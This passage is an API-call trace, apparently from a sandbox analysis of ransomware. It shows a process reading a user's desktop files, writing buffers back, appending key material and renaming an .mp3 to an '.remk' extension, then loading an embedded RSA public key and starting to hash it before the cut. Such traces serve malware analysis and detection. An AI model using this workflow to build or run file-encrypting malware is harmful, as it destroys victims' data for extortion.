[0231.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x185e0) returned 0x37c2278 [0231.347] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.347] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.347] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c13b0 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edda0 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c13f8 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddb8 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edde8 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede00 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.348] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede48 | out: hHeap=0x630000) returned 1 [0231.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.348] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede00 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edde8 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.348] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede48 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.349] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.349] GetCurrentThreadId () returned 0x314 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x6975b8 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.349] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.350] GetCurrentThreadId () returned 0x314 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede48 [0231.350] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0231.350] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edde8 [0231.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede00 [0231.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0231.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddd0 [0231.351] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0231.351] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede60 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede30 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede18 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede78 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ede18 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede30 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edde8 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede48 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede78 | out: hHeap=0x630000) returned 1 [0231.352] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0231.352] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0231.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0231.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edde8 | out: hHeap=0x630000) returned 1 [0231.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0231.353] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.353] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede60 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddb8 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c13f8 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.354] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.354] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x185dc, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x185dc, lpOverlapped=0x0) returned 1 [0231.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0231.355] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x185e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.355] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0231.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0231.355] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0231.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0231.355] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0231.356] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0231.356] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.356] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.356] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.356] CloseHandle (hObject=0x640) returned 1 [0231.358] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.358] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0231.358] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0231.358] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\irDzr_W5E9Ov4Y9L.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irdzr_w5e9ov4y9l.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\irDzr_W5E9Ov4Y9L.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\irdzr_w5e9ov4y9l.mp3.remk")) returned 1 [0231.359] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.359] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.359] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.360] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2fefa80, ftCreationTime.dwHighDateTime=0x1d5e1e3, ftLastAccessTime.dwLowDateTime=0xb53a8eb0, ftLastAccessTime.dwHighDateTime=0x1d5d95c, ftLastWriteTime.dwLowDateTime=0xb53a8eb0, ftLastWriteTime.dwHighDateTime=0x1d5d95c, nFileSizeHigh=0x0, nFileSizeLow=0x17c68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kcgsXO3.gif", cAlternateFileName="")) returned 1 [0231.360] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.360] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.360] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0231.360] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kcgsXO3.gif") returned=".gif" [0231.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kcgsXO3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kcgsxo3.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.360] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=97384) returned 1 [0231.361] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.363] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17c42, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.363] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.364] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.364] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.364] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.364] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x17c68, lpOverlapped=0x0) returned 1 [0231.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.365] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.365] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.365] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.367] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.367] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.367] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, 